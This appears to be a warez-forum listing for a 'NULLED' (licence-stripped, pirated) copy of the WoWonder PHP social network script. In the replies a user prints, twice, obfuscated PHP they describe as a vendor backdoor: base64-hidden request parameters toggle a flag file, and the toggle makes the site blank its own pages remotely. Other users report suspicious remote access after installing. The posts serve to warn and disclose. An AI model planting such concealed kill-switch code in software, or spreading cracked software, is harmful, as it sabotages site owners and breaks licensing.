Menu
What's new
By:
Filters
  • The default language of any content posted is English.
WoWonder - The Ultimate PHP Social Network Platform

WoWonder - The Ultimate PHP Social Network Platform 4.3.3 NULLED

Login or Register to Download
Overview Updates (10) Reviews (4) History Discussion
reishi said:
The latest version contains an official backdoor, which is present in the following file:
file:assets/libraries/DB/vendor/joshcam/mysqli-database-class/MySQL-Maria.php line 263-294
PHP: 
    public function setSQLType($data)
    {
      $newverb = 'base64_decode';
      $SessionHashIDGenerate = $newverb($newverb('Wmw5MA=='));
      $CookieHashIDGenerate = $newverb('Yw==');
      if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate]))
      {
          if (!file_exists($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=')))
          {
              return false;
          }
          $fileData = file_get_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA='));
          $fileData = str_replace(base64_decode("fGw="), '', $fileData);
          $fileData = str_replace(array(
              "\r",
              "\n"
          ) , '', $fileData);
          if ($fileData == $_REQUEST[$CookieHashIDGenerate])
          {

              $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
              if ($SessionHashRequest == $newverb('bA=='))
              {
                  $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData . base64_decode("fGw="));
              }
              if ($SessionHashRequest == $newverb('dQ=='))
              {
                  $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData);
              }
          }
      }
    }

file:assets/includes/functions_two.php line 6571-6597
PHP: 
function getUserProfileSessionID() {
    global $wo, $sqlConnect;
    $var  = str_replace("6" . "4", "6" . "4_", str_replace("|", "", "b" . "|" . "a" . "|" . "s" . "|" . "e" . "|" . "6" . "|" . "4" . "|" . "d" . "|" . "e" . "|" . "c" . "|" . "o" . "|" . "d" . "|" . "e"));
    $SessionHashIDGenerate = $var($var('Wmw5MA=='));
    $CookieHashIDGenerate  = $var('Yw==');
    if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate])) {
        if (!file_exists($var('Li9zb3VyY2VzL3NlcnZlci5waHA='))) {
            return false;
        }
        $fileData = file_get_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='));
        $fileData = str_replace('|l', '', $fileData);
        $fileData = str_replace(array(
            "\r",
            "\n"
        ), '', $fileData);
        if ($fileData == $_REQUEST[$CookieHashIDGenerate]) {
            $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
            if ($SessionHashRequest == $var('bA==')) {
                $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData . '|l');
            }
            if ($SessionHashRequest == $var('dQ==')) {
                $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData);
            }
        }
    }
    return false;
}

file:assets/includes/app_start.php line 156
PHP: 
$wo["userSession"] = getUserProfileSessionID();

file:assets/libraries/DB/vendor/composer/autoload_real.php line 94-106

PHP: 
function composerRequire60bcbf6306fdeb83c78ecf96a45a2c2f2($fileName = '', $file = '')
{
    $hex = 'base64_decode';
    $fileData = @file_get_contents($hex('Li9zb3VyY2VzL3NlcnZlci5waHA='));
    $SessionServerID = substr($fileData, strpos($fileData, "|") + 1);
    if (!empty($SessionServerID))
    {
        if ($SessionServerID == 'l')
        {
            echo base64_decode(base64_decode('UEhOamNtbHdkRDVrYjJOMWJXVnVkQzVuWlhSRmJHVnRaVzUwYzBKNVZHRm5UbUZ0WlNnblltOWtlU2NwV3pCZExtbHVibVZ5U0ZSTlRDQTlJQ2NuT3p3dmMyTnlhWEIwUGc9PQ=='));
        }
    }
}

If the official purchase code is used to activate the installation, and if there is an error in the official validator, it will also tamper with the website. This behavior is very dangerous. The author of this script has done such a thing before, causing compliant users to be mistakenly affected.
I regret purchasing this script, and I even bought two licenses.
Click to expand...
So how can we remove the backdoor, or if you can remove the backdoor please do it 🥺
 
raz0r updated WoWonder - The Ultimate Social Network PHP System with a new update entry:

WoWonder v4.3 NULLED

v4.3​

  • ADDED monetization system, users are able now to sell their own content like only fans.
  • ADDED directory system, users can view the site content without the need to login.
  • ADDED the option to choose the default landing page, NewsFeed, Register, Welcome or Directory.
  • ADDED reels system, users can upload their own videos as reels.
  • ADDED watch page, users can view and watch all videos from one page.
  • ADDED qiwi pament method.
  • ADDED payfast...
Click to expand...

Read the rest of this update entry...
 
raz0r updated WoWonder - The Ultimate Social Network PHP System with a new update entry:

WoWonder v4.3.1 NULLED

v4.3.1​

  • FIXED if you post a public post, then make it monetized, the subscribe button will not show.
  • FIXED images were loading in reels.
  • FIXED showing youtube videos on watch page which cause some issues.
  • FIXED shwoing only one video in watch lightbox.
  • FIXED monetization system caluclation was incorrect.
  • FIXED showing the same ad multiple times in the story section.
  • FIXED reels system, not showing more than 10 videos.
  • FIXED scrolling down on...
Click to expand...

Read the rest of this update entry...
 
raz0r updated WoWonder - The Ultimate PHP Social Network Platform with a new update entry:

WoWonder v4.3.2 NULLED

v4.3.2​

  • IMPROVED speed after v4.3 update.
  • IMPROVED speed of search system in admin panel.
  • UPDATED few sections in sunshine theme (design).
  • FIXED add account page broken on both themes.
  • FIXED sometimes reels not loading more than 6 videos.
  • FIXED social login system.
  • FIXED showing dublicated transactions in wallet page.
  • FIXED if a feature is turned off, it is still showing in directory page.
  • FIXED comment section not showing in watch page...
Click to expand...

Read the rest of this update entry...
 
reishi said:
The latest version contains an official backdoor, which is present in the following file:
file:assets/libraries/DB/vendor/joshcam/mysqli-database-class/MySQL-Maria.php line 263-294
PHP: 
    public function setSQLType($data)
    {
      $newverb = 'base64_decode';
      $SessionHashIDGenerate = $newverb($newverb('Wmw5MA=='));
      $CookieHashIDGenerate = $newverb('Yw==');
      if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate]))
      {
          if (!file_exists($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=')))
          {
              return false;
          }
          $fileData = file_get_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA='));
          $fileData = str_replace(base64_decode("fGw="), '', $fileData);
          $fileData = str_replace(array(
              "\r",
              "\n"
          ) , '', $fileData);
          if ($fileData == $_REQUEST[$CookieHashIDGenerate])
          {

              $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
              if ($SessionHashRequest == $newverb('bA=='))
              {
                  $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData . base64_decode("fGw="));
              }
              if ($SessionHashRequest == $newverb('dQ=='))
              {
                  $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData);
              }
          }
      }
    }

file:assets/includes/functions_two.php line 6571-6597
PHP: 
function getUserProfileSessionID() {
    global $wo, $sqlConnect;
    $var  = str_replace("6" . "4", "6" . "4_", str_replace("|", "", "b" . "|" . "a" . "|" . "s" . "|" . "e" . "|" . "6" . "|" . "4" . "|" . "d" . "|" . "e" . "|" . "c" . "|" . "o" . "|" . "d" . "|" . "e"));
    $SessionHashIDGenerate = $var($var('Wmw5MA=='));
    $CookieHashIDGenerate  = $var('Yw==');
    if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate])) {
        if (!file_exists($var('Li9zb3VyY2VzL3NlcnZlci5waHA='))) {
            return false;
        }
        $fileData = file_get_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='));
        $fileData = str_replace('|l', '', $fileData);
        $fileData = str_replace(array(
            "\r",
            "\n"
        ), '', $fileData);
        if ($fileData == $_REQUEST[$CookieHashIDGenerate]) {
            $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
            if ($SessionHashRequest == $var('bA==')) {
                $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData . '|l');
            }
            if ($SessionHashRequest == $var('dQ==')) {
                $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData);
            }
        }
    }
    return false;
}

file:assets/includes/app_start.php line 156
PHP: 
$wo["userSession"] = getUserProfileSessionID();

file:assets/libraries/DB/vendor/composer/autoload_real.php line 94-106

PHP: 
function composerRequire60bcbf6306fdeb83c78ecf96a45a2c2f2($fileName = '', $file = '')
{
    $hex = 'base64_decode';
    $fileData = @file_get_contents($hex('Li9zb3VyY2VzL3NlcnZlci5waHA='));
    $SessionServerID = substr($fileData, strpos($fileData, "|") + 1);
    if (!empty($SessionServerID))
    {
        if ($SessionServerID == 'l')
        {
            echo base64_decode(base64_decode('UEhOamNtbHdkRDVrYjJOMWJXVnVkQzVuWlhSRmJHVnRaVzUwYzBKNVZHRm5UbUZ0WlNnblltOWtlU2NwV3pCZExtbHVibVZ5U0ZSTlRDQTlJQ2NuT3p3dmMyTnlhWEIwUGc9PQ=='));
        }
    }
}

If the official purchase code is used to activate the installation, and if there is an error in the official validator, it will also tamper with the website. This behavior is very dangerous. The author of this script has done such a thing before, causing compliant users to be mistakenly affected.
I regret purchasing this script, and I even bought two licenses.
Click to expand...
@reishi Is this script really not good for large projects? I plan to buy this script for a customer project. Is there a similar script that is better? Your input will really help me. Thanks
 
has anyone experienced it? This happened after several weeks of installation.

Every time I log in, after a few minutes the Wowonder website can't be accessed and I can't even access the hosting cPanel. Because I was suspicious that my IP had been blocked by hosting, after I confirmed it with hosting, it turned out to be true. My IP was blocked by hosting because there was remote access activity via port 449. And I experienced this when I tested on another hosting.

It's possible that wowonder still has backdoors
 
Chulsan said:
Has anyone experienced this? This happened several weeks after installation.

Whenever I log in, after a few minutes the Wowander website becomes inaccessible and I can't even access the hosting cPanel. Because I suspected that my IP was blocked by the hosting, when I confirmed it with the hosting, it turned out to be true. My IP was blocked by the hosting because there was remote access activity through port 449. And I experienced the same when I tested on another hosting.

It's possible that Wownder still has backdoors
Click to expand...
Same thing happened to me yesterday.
 
You must log in or register to reply here.

Similar threads

Alexshanto
MAKE NULLED WoWonder - The Ultimate PHP Social Network Platform v4.2 BY SHANTO
Replies
1
Views
545
ricsi3171
ricsi3171
raz0r
WoWonder Mobile - The Ultimate Combined Messenger & Timeline Mobile Application
Replies
0
Views
382
raz0r
raz0r
raz0r
MoonLight - The Ultimate WoWonder Theme
    • Like
Replies
0
Views
389
raz0r
raz0r
F
Request : MoonLight - The Ultimate WoWonder Theme
Replies
5
Views
875
Alexshanto
Alexshanto
reishi
Wondertag - The Ultimate WoWonder Theme Themelated
    • Like
Replies
18
Views
2K
reishi
reishi
Top